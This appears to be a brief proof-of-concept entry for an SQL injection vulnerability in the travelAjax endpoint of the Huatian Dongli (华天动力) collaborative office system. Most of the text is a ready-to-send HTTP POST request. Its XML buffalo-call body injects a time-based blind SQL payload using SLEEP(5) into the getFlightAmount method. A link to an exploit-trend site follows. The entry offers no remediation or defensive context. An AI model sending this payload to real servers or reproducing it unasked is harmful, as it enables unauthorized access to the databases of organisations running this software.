华天动力协同办公系统travelAjax存在SQL注入漏洞

Description

华天动力协同办公系统travelAjax存在SQL注入漏洞

PoC

POST /OAapp/bfapp/buffalo/travelAjax HTTP/1.1
Content-Type: text/xml;charset=UTF-8

<buffalo-call>
<method>getFlightAmount</method>
<string>-1' AND (SELECT 8445 FROM (SELECT(SLEEP(5)))VlEC) AND 'iUle'='iUle</string>
</buffalo-call>

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References